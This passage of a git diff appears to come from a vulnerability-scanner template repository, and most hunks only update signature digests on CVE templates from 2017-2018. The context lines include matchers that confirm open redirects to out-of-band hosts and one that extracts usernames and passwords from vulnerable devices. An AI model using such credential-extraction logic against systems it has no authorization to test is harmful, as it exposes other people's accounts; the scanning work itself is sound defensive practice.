4a0a00473045022068debbab53e83ee976708f1d2ca8851180b6f564a225104e0dc23e2d38c90338022100905e0998e891e9687927d23890701a4fc95b43ade405d81f62d8d2d66152ff4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 8a421a0ffe9..0fdcfdad28f 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -39,4 +39,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 490a0046304402205578b4d6a044fa4a1e769189f3f82536b84fff996d15db64558938cacbc78afd0220571eb249f886d6dbfce5f28a9db4ea69f7ebb2581a0a2ccfa1c2749a3264bfc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6289d0469c48323d15407095068b0e88951474ce5a75fa4858689c13190438d022100cc526138327bab99b1a54d33a4e3892e15ab3d807646fac38557876dc77c9e36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index ddfc7f8d597..753e9d6a5b3 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -48,4 +48,4 @@ http: part: header words: - "text/html" -# digest: 4b0a00483046022100e1ca87148d0dcf94a8235558db17b4be834541951089ed75ec7a0e14042239dd0221008a626907b7f3c857fd9cda48d154b629c1aab1e5cd8ed36465e4a0118bded6c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204970dd5738c8cdf78216a674ae72bc84369dc60c14cb955861a26be29692620d022100a49382e92e24237b22d97ee1b4a51cc221ba28d6f1ab92b870474888f3d8eba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 59bd5e25369..00d7b74185a 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022025da3c04c564c26fbb53b81cefbee3c24b9fd2c18cdbb625eb6de8cef8b49bba02203dd5851f2dd1df715e15f608f8246b3a673b41d9a6853a4b6cd0baee8df0e3c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053fe84ed76dc03f3ac5fc7ee57a7e11d65b12ee5b31fe5f9359b5a59edf2296202203b33810fab3984249d0042e14cfbd00516fb32fe84b107f42fd03d97678481aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5868.yaml b/http/cves/2017/CVE-2017-5868.yaml index b1499bb30d0..a9a324f3202 100644 --- a/http/cves/2017/CVE-2017-5868.yaml +++ b/http/cves/2017/CVE-2017-5868.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502206726cc2f8a0d1aaf1b2afd2475f6e93f9d30397c46027ebfe76c36ebe14cca68022100c8c9bb89a69643f6fbd39b110d61f19d79987d04a647e393cfe4dba07294ffba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205947f379f857b3d512ffe1fb74ce5400304bf3a3d44c91925b034ba787276f54022100f5054f76d1c7d04c2d4f79fe0c591268e9392b9670d1a1cb056f4a729dec75a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5871.yaml b/http/cves/2017/CVE-2017-5871.yaml index c22a3aa699e..5e937f2db15 100644 --- a/http/cves/2017/CVE-2017-5871.yaml +++ b/http/cves/2017/CVE-2017-5871.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4b0a00483046022100a2fc50007ddeb4d4474dda13cd30c686bce5924de127254c5c90dd5ea9dd01cf022100dd86801c3eb95ff8f5a765ab618ff0c1473e9470cbfab8b9ba174c0dc4e82afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f5d42d0c27a2ed1637648daf883bf13918dbc912654bdc5d5239a035d610dbf0220230228fcb3cd5519f20d40bb40fee3d434efede99e908b73bcfd7a0c5b1694c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5983.yaml b/http/cves/2017/CVE-2017-5983.yaml index 735abdf816f..238afee31d9 100644 --- a/http/cves/2017/CVE-2017-5983.yaml +++ b/http/cves/2017/CVE-2017-5983.yaml @@ -78,4 +78,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100e86215b067f7b6459fa85966babbe521293f6d0788dde5d4bd7a9831c9c12390022100f72fb855e5d18169ec13f8dbaa6120dabd811b74546f3a8ed77975a9046c8f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d5b049b064490cd5c97f0646816a80695e0f32f14b843932e0541f840d8693c02206fda30dc4344718ac1d9fe60038951eb08014ef2860dee28ef24058e220ef124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 24b1577fc3e..0d67f65bf56 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009f85e653f6d2dd900e273c0ae7f015fe05c01ee196473e654d39f5053fa577c4022100e19d18d449f6bbc533228299064bfe57f3ee9d7ad03cddc04c6067259de637bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008485ccfd26041c78139e8c82e2df9fcb7bd63ef33217146bae0665a80849951a022100d92893ef2c8c93ad40e93fa64d0dd45f3c229c5069c54bd41b36c4ecd7343a99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 4173e98d071..65b56363daa 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b647c8d99778a235b18b55beb9add5eafa6f3fc26a7bb560fa329723f5483da0220042262d9da23ada9bfc2463c8c3c10cef6ade055a8b8af6da912fcd19316a2a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038877ec5cf36af6a73518f7fd54337bdde99f82865c2a539fb2e3fe4df93d6da022100d86d7372aaf1bf264ec9d792cee4f2b9b218cbce93825d93a723ac659e3b99c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index c8f9d728152..64d58c66b70 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -45,4 +45,4 @@ http: part: header words: - "application/xml" -# digest: 4b0a00483046022100f35fc536834162fdde5a8bb151a85e2805b3ecb8fc9abdc835fbb011a16058ae022100a9a4a3616e4d3817484b29c7889789fb93b0c8d99a296e3b077bffb047caf95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046139d858bd38f580031a8b1da6c5b0f0bdbdf259e42278082c984a6f9b01d7d02204c633ffd2f73962cdc951c433307eae2479b1adc523ec7257899ade325d39b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 7fb07975f2e..a3552f7ff4d 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -48,4 +48,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 490a0046304402207fd4a6a954cbe4eb83dee569173a392b03906bd72446da7d0c5f3eaa4ff5f6a40220096e18768d61671abdda7c826e051b50ddd8807a6108049c129744409334b1f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049d3cdf05d80b0d55c9a04aa1f7f22fbc78b35cce0a4b5b2460d366a64e88287022100a0284ba891b2790754668ed31d23c271182a9223d653e432338eadf22ebbda9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index fbb8f9bd778..03af6741b0d 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -49,4 +49,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 4b0a00483046022100ff3432fb437247982330d9a9a8f824b435ad20a52bfe525a8562767251435df4022100a47da089f2d3d5b7a7ea26a5e46e293d7530fff2276664de254a712b97a558c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022068101ff4085204dedd3fa5364c0c63757379b0afa5711b9f7181de1ce6d2df96022100cbdd8ecaeae06e765dc1ef8cc17f19bbf31051c2843ba8951a451d49c9085dd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 2411382718b..3b443fded7e 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022034c2a3499f9c32ee06e1a3467b38cffbf614b4ffaee924c2c179ee7f875a2716022100eaca9cd66ab7a1eca30631e085397cff4dce90a48cdb77c0bf429c5fbd4a3f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022031d9649dc68ad66f278fcf630b5fb6177317d63f184ec3af3165461009de85c6022067cba070dcc10a1475db7d175cd09be971155ec346648233fa80967dca3d7392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 786fe5cf82a..a369c01859b 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -56,4 +56,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022002238ecc71ce4a9b1e2117f0077c75f5693a73c21cd8fcecfc56f05768ad511d022100f870028f3fb452e7d2a5a753375032aed1a317882976cb812b6e6b187b7fb78f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052afc018a0a0857a5564698a4afbbfc3f1133fc7bd80b424b0cdccdcfbb16797022100d888d830485050b3a393ad2c7925082dd96406b0eb6a724afdbd04ad5e5e67b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 4183b05892b..d9e170245b8 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a004830460221008213ec48de5f85cb410f7e291bffb0580141ef04ca46feb4532abb3990058844022100b29fdbaa185271f20ee22354850202a4de42db5320c36c37e335b2fcbc89231a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c525e8e639b9faa49eba7cfce2a7d7040484a1e9a69625dc7675ae6a52d9a630220301bb00e17aaaf805b10a04f58da36e45317db143258b67c9f9d5d3145c0a2b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9965.yaml b/http/cves/2017/CVE-2017-9965.yaml index 2488242406b..a2b7b9bc754 100644 --- a/http/cves/2017/CVE-2017-9965.yaml +++ b/http/cves/2017/CVE-2017-9965.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200861eafe29b7122af73226cdc6fdc5012854988ed3db6e14437be0b96946148f0220344a98bd4b998d0a829c10dfe87b7b5ce7e7782e5ed9683c39acb725d0026e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb1e8696594df102f37fb9ddba92affdd4abe207a83b4a77e9a1d03fb4e03d78022100df0b08674fddbc96cb3e4ab1e96f8d7b8f37feed34e87b348858bd7e02d3d49a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 6ab5fd5e6ea..eddc5851bda 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba3df65925ee029b794a1ed07072b624169ca7c671de6ab24c6801bdea313dc702210092843dfdb6054bbc8f965949376a24e1daf4961b4a5fd5fa8ad4eb4c456e6430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dba86fa247f84e095f0b4198cfef60afa88b571d6ca3a338fda1d7a6007d93e8022100bf8886c145aa76bad1ad3abbd020e54c64f338d49e621e6aa1f4acc0d1687019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 060bfcf8243..e45315e0250 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8867693fd648d43b91c8c7867a21163a8a28ea2daa70ffa32abb1bd42cf54de022100c195d1e3d8c8d4fce7da25acb5ddec1fa206a396ad0f4b7ecbdb64042ac79ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df59211aab792bbda6cc971f2f3c7060ec00c7058077f9b71a4e627f453cc7470220422370608f6a3fc134af895b299618d03c61220adf0c7d2cb90554f93837197f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 06cd66ae2cc..fd5fbfc5811 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022023b832a37322b0560bd891e092bfb5353820854e93d0ee8a2f1a3c092ec0fe4202210091aeb4c7c5ce2f0bec4022e4c961f320cf99b1a406aa47fd315945d6afef177a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070cc2284aeb2f55f4b80e70b0cdea373c57fe749d7b66da07b0a5522d4eed2ac022000ed2c30ad163a26724e97847fd077c0eb342aaf13e001d4c5af6bf9f79687ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index f35d35724ab..090fd899bc1 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad6af33eff483be59da1414228f7184a313d0caca49dda4589b42e188106e6b102204e4b19c1093764d5206baff5d9cf1e40f4691eb591c5478dc6e36e941054e942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be46e6acd7592cd9e6d239da71c3e3abb9d2ac6fe4901a3901ac8f24bdffd7b8022100cf61d28aa6a80f858b0462477b51c5f145aad88c98b5636c31ffd4a59cb11d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index cd4c6e97ef6..2dcb83560e6 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d8ba2eed1a4bdf6534d39eb9b5b3b0c288be7f7ecf570ac8e07f6adb42e2115e022025e254b191f8097df3f38751398a875a878b5dbf34dc2ece870b707e013dec1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c916adce34f2a36e515c2753fd736fbaee0a0ce9a5512401a3d2d99e115c37fc02207321744e6fab5f53e02acb60daca644389d44ff425c79d9e03f19c3c4b6842b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 222ab2a9d02..8ea5ea0dc61 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e62c265965439db42551f6777d9f8236810eabeca8960509881eca6c7a507167022100a70e75831a7b11c55572b39b0fb75a3f1df6e90218eef6e36734938d2a418db8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfff86442f340e4bc69535e19f5594cdc684cac5dba21865e6a9b5fbc347ba00022068236218ac10e4939f444f5d83f60802e12ab841a1dbc9ba46cf5673db4c9413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index a38fcfbc5b4..0dc5c8e0c9c 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220696343f488c634ce11d05d8ffda472684cbe1707a3cb432d169aecf258f85f12022023fd67686d6071928fedba8f60953621886294057815e6266afc86a7eb7f4da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040cf57b5facbb333136e02f27f830ca82e709ef74779a8fff29a15e796fb654402202236c2a1750e05855982d46b6c9bc186ec04d431e0b41a6e565855ee17dd809a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 9ef7ae2fa06..cad9a26b47e 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -46,4 +46,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a004730450221008586dfb84f64265dc5f0975a1ae3fdb8791154b2b5b172fe6dba858f3ec4553e022042ee982512d0ab63857001298a1e6cca1ff9c66d3ffecef0f777e3d8108c7f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c79f0204022b518d628198ca7288d6df54c7eaacb8ebb4ad017e27be6905e3dd022100fad9a75a9c9c0788915dd59b6941dcc913267582e6a0f4380715ba146753395b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 0c5924ab6e2..cc297957f89 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207b63abe71d990c5c2dfe0699f48ab592a32871f3389e9410e8c1377663b3870d022016380c6172e7426da1a2143b3d9bde08f6430647e0e8ba8bde87239f6c05adfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b967733ef9f943cf2313cafcf0c1f854015e844781bcae2b39c644c4ec89992022100aec401508c4657862f5ba22b47d65aee871b617ce83cc2f34d39a2c833e7cb6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 20dacb28567..fd234883661 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -57,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4b0a00483046022100d9fd6a63efd8e95a931b370b7b268489e6eb060740349840e70c20f0e8e6b4f3022100e3156dac20e4650462c0481ac33ec6f890a76d7cf350419a4462861fd68b7012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220112a624798679e9dfd2c95b8a26a6bd127ed93e393dd402df6451bc43381e64b022100c3ea48ab81162ced176f760d873cda636fb2b167ba6e506a53fc5c875201d596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11133.yaml b/http/cves/2018/CVE-2018-11133.yaml index 7c162e4b4d0..b7f4eadafd1 100644 --- a/http/cves/2018/CVE-2018-11133.yaml +++ b/http/cves/2018/CVE-2018-11133.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ab9a56035aeea23336eefb0db10303c3e847dccea2c0acad18ab4fd3280288702200fd966fd194a93f9b21d40aa4ead7b9ff499f2e32372e9f90dcb9619bc0f732b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc901e1ee69e3a09e50a1074f2e83f7e927a709fff012ff8508969ac3cafb35202205ec8fb48d3e8449f18fa851618c51ed662364250b5fbfb4a1bc40ce40bf7eceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 887659a51aa..a1558130c91 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb822ab27c5b7eae41966bbda7b4f084a5bee24a34ed70dee939d68896c038d6022100dee7f338f3085dddfa23fa810da6e65b7eb9cf0fbb949e54954b6bfd257397b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201805a88d622ab0ff22c05026a4e205c11a9ed9ab1faf0e3ce86eb17193d18c3102205298f156bfe8ecd0e090614170a841e5128d942b3a3471d57914bf1836177cfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 8ff6fcee820..99cac3983af 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -71,4 +71,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 4b0a00483046022100b2e6c94a4643d3a5e8e6baddbae9e94a67162c7a6b641ce4c1e94a0223ea5e83022100cc753222f380dea9bc5c38da5f9677a0d0cd9a2d141b58fff48a9f240ce84dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ffbc0ec1b006c9dac8bdb507ddb28195a891534eae539a14dcc57c33bb6ce672022100ddb713a236f911aad31a036efded78b66e0f6cceed9e42e2493113aaff916ea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11511.yaml b/http/cves/2018/CVE-2018-11511.yaml index 1c2b7906338..160d355e379 100644 --- a/http/cves/2018/CVE-2018-11511.yaml +++ b/http/cves/2018/CVE-2018-11511.yaml @@ -57,4 +57,4 @@ http: - 'contains(body, "success\":")' - 'contains_any(body, "album_not_exist\"", "album_items\":")' condition: and -# digest: 4a0a0047304502201669db83c230f72b480c0a9d4ad28a8d75ad7926e44e9cb7fabe8adf67f6b98e0221008b6e20d903c4498a8b3f4ccefcfb0f74350b37e6fdf7c83dce81e89ab82913a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1ec642b02d976c68e766e9cd9b5dc52f1a335915a1156cbee491dc0833c00f2022061ce5481d3a82c839135a5cbd83c9baeef650c3646bdd88e6e7d19930c0b1406:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11686.yaml b/http/cves/2018/CVE-2018-11686.yaml index 8ba75d486d0..0e83484ed3d 100644 --- a/http/cves/2018/CVE-2018-11686.yaml +++ b/http/cves/2018/CVE-2018-11686.yaml @@ -73,4 +73,4 @@ http: - 'contains(content_type_2, "text/plain")' - 'contains(location_1, "index.php")' condition: and -# digest: 490a0046304402204c15ad59f468a1813a72757651c82c2bdd37bbda157e3c71fa33f1aadb33ddcd02200d953c5e38e28a6c59a9cd19bc84e72c00bfda2ed2b38e95403f4c2c5818a1cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087fb255f83001223155a63bf7751bedc0b601dd8948d1cd89bf217d5200c62df022065622221a75c9497a5abb7511c1da8592ce169f9540393e8c780fba27875f893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index d250944c31e..77eb6d5dd10 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a03671d782669bc091904a293f56335d1eb724a3f121717f24921884437b25a022100a4f68d5cac98559233190ca9e020c5d811e8dd5b6357038dd06d8fcce39d5e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220013620632b81bcd1a9c10ed1b23cc200da7f1cf0dd83638ba1ad13e9d39f1f56022100ce2966ab828a45d904d309bf7c9801f20ae8e537f16bc08320d96d6b924a4d1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index edd4c82bc3f..f90cd676cc7 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202884c9f5870a1e2b6b2ddab71fdb2145061009cc0c0357517c6331c24a4cc65902210090958210fde835b1da0df219d506de0470203ec727ff6e62c4dfe97f1bc2e6b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205511ba1bcd82fec5ffe9a027a12491e55559523731df984c297b5e664ba74d94022100b78c461c8f4bd49ceb0f0c2210ab2dd536f6b150e33437efab88bd98b65e7c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index ac48ff5c1b1..f4c6076eeb5 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210094ef72bb3f35e79eea66159399fade6511ca294fc847109d08d956c4ed65d3f00220745f97e11ccb025250d28cf7c0fd3064bab8de0b45da027002355f4830ae471a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5be67ab1c9cd11fd289db34cfb4ec9bf3b864b52833a5b0573f92021dfba026022100b77e8d70927b6fb8f3d81fb6ee875af4f14bf3cb825dd5a39f669555a289cb2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 39937b33a9b..ab618af1766 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022001538382b2cb54f29ae3ee85b6c408853b49ee2aa59da5186972dc71b838dc4e02203fd5b8b9b16450595810152a5fdc5bf8b2080b08f7e8af08a0bf81627d3d4b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc44d74d556db4a8723a9e68d48a4b3dedcec8eb92b6e1ad445a0cc53e5489fd022100e202b7437f72068c843b61ff70c5ac17329ef659897424d115fb83fbc84d2117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml index 72609912a2a..fcf95ffa119 100644 --- a/http/cves/2018/CVE-2018-1217.yaml +++ b/http/cves/2018/CVE-2018-1217.yaml @@ -65,4 +65,4 @@ http: - type: dsl dsl: - '"Username: " + username + " Password: " + password' -# digest: 490a0046304402207c99ee0fded9d553c1bf4aeca44d0b9c9817d0cd366f703e0a179218c9bdfdef022044536c4a4f859c3c89283a164e3b70bd6a124a4a22d8568eb2fec3ed86274bc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d5a902517a337a5b00dab5b2882deaccbd083f61b1e8d1a1b69d0c72fecbf7d02201e91ffca46ba1444ca29a9a5a4c5e3531e37254b7ac0e9b160ea9eb714837627:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 974d7ff3ade..3de3ea6e944 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -51,4 +51,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 